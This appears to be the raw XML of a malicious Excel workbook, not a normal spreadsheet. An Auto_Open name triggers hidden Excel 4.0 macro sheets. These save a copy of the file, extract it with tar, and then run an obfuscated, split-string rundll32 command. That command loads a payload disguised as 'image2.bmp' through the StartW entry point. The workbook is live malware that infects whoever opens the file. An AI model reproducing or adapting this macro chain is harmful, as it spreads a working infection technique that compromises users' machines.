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bmp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Nowiy\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2705F79C-360B-4C75-A6CF-619100367372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" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="3" state="hidden" r:id="rId2"/>
    <sheet name="Kuope" sheetId="4" state="hidden" r:id="rId3"/>
    <sheet name="Nolaert" sheetId="2" state="hidden" r:id="rId4"/>
    <sheet name="Bkidydj" sheetId="6" state="hidden" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">Kuope!$H$4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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
  <si>
    <t>dll32 ..\xl\media\im</t>
  </si>
  <si>
    <t>age2.bmp,StartW</t>
  </si>
  <si>
    <t>run</t>
  </si>
  <si>
    <t>..\Nioka.meposv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</si>
</sst>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microsoft.com/office/2006/relationships/xlMacrosheet" Target="macro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Macrosheet" Target="macrosheets/sheet3.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macro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b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47624</xdr:colOff>
      <xdr:row>51</xdr:row>
      <xdr:rowOff>85724</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="Pictures">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5D2506-44F7-4112-BA08-E2191B317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01224" cy="98012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600075</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>13</xdr:col>
      <xdr:colOff>57150</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>66675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C9732EA2-20B6-49B0-932F-23F4E0D5D0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5275" y="0"/>
          <a:ext cx="66675" cy="66675"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/macro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2BAA9A6-CCD7-4C96-B244-8027D75B3DA4}">
  <dimension ref="H23:I28"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="8.85546875" style="2"/>
  </cols>
  <sheetData>
    <row r="23" spans="8:9" x14ac:dyDescent="0.25">
      <c r="H23" s="2" t="b">
        <f>SAVE.COPY.AS(I23)</f>
        <v>0</v>
      </c>
      <c r="I23" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="28" spans="8:9" x14ac:dyDescent="0.25">
      <c r="H28" s="2" t="e">
        <f>GOTO(Nolaert!AK161)</f>
        <v>#N/A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200-000000000000}">
  <dimension ref="AJ701:AL717"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.28515625" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="10.28515625" style="2"/>
  </cols>
  <sheetData>
    <row r="701" spans="36:38" x14ac:dyDescent="0.25">
      <c r="AL701" s="2" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="702" spans="36:38" x14ac:dyDescent="0.25">
      <c r="AL702" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="703" spans="36:38" x14ac:dyDescent="0.25">
      <c r="AK703" s="2" t="b">
        <f>EXEC(AJ704)=PI()=PI()=PI()</f>
        <v>0</v>
      </c>
      <c r="AL703" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="704" spans="36:38" x14ac:dyDescent="0.25">
      <c r="AJ704" s="2" t="str">
        <f>"tar -xf ..\Nioka.meposv -C ..\"</f>
        <v>tar -xf ..\Nioka.meposv -C ..\</v>
      </c>
    </row>
    <row r="706" spans="37:37" x14ac:dyDescent="0.25">
      <c r="AK706" s="2" t="b">
        <f>WAIT(NOW()+"00:00:06")</f>
        <v>0</v>
      </c>
    </row>
    <row r="717" spans="37:37" x14ac:dyDescent="0.25">
      <c r="AK717" s="2" t="e">
        <f>GOTO(Bkidydj!G5)</f>
        <v>#N/A</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1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2FD7C7A-A3BA-4BD4-A707-DDD14281DB2B}">
  <dimension ref="G14:G19"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="8.7109375" style="2"/>
  </cols>
  <sheetData>
    <row r="14" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G14" s="2" t="b">
        <f>EXEC(Nolaert!AL701&amp;Nolaert!AL702&amp;Nolaert!AL703)</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="7:7" x14ac:dyDescent="0.25">
      <c r="G19" s="2" t="b">
        <f>HALT()</f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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="5" baseType="lpstr">
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>Kuope</vt:lpstr>
      <vt:lpstr>Nolaert</vt:lpstr>
      <vt:lpstr>Bkidydj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Rabota</dc:creator>
  <cp:lastModifiedBy>Brifes</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T11:52:13Z</dcterms:modified>
</cp:coreProperties>
</file>